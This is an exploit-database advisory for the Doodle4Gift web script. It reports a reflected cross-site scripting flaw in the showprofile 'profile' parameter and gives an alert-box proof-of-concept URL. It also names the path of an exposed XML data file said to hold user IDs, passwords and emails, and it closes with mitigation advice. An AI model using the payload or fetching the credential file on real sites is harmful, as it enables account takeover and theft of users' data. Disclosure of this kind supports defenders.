header-logo
Suggest Exploit
vendor:
Doodle4Gift
by:
Dr.NaNo
8,8
CVSS
HIGH
Cross Site Scripting (XSS) and Information Disclosure
79 (XSS) and 200 (Information Disclosure)
CWE
Product Name: Doodle4Gift
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Exploit Title : Doodle4Gift <= Multiple Vulnerabilities

The vulnerability exists in the showprofile parameter of the index.php file. An attacker can inject malicious JavaScript code in the profile parameter to perform XSS attacks. Additionally, the doodle4gift.xml file contains sensitive information such as Id, Password, and Email.

Mitigation:

Input validation should be performed on the showprofile parameter to prevent XSS attacks. The doodle4gift.xml file should be removed or restricted to authorized users.
Source

Exploit-DB raw data:

# Exploit Title :  Doodle4Gift <= Multiple Vulnerabilities
# Author        :  Dr.NaNo
# Date          :  H-1435/3/18 - 2014/1/19
# Software Link :  http://www.hotscripts.com/listing/doodle4gift/
# Software Link2:  https://sites.google.com/site/doodle4gift/
#
#
#            (1) Cross Site Scripting (XSS):
#
#
#      http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
#
#      http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
#	 
#	 
#
#            (2) information disclosure:
#
#
#      http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
#
#
#
#                  A special gift for: (P0c Team),(V4-Team):إهداءً خاصاً لـ
#
#